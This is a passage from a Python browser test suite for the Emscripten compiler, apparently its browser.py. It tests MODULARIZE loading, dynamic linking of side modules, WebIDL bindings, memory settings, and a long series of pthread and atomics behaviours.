setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'WASM_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
@no_wasm_backend('cannot customize TOTAL_MEMORY in wasm at runtime')
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@no_wasm_backend('dynamic linking')
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
# -> do the assert about expected output inside browser.
#
# we have to put the hook into post.js because in main it is too late
# (in main we won't be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# setup by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@no_wasm_backend('dynamic linking')
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), that it's not a deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn calls to the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
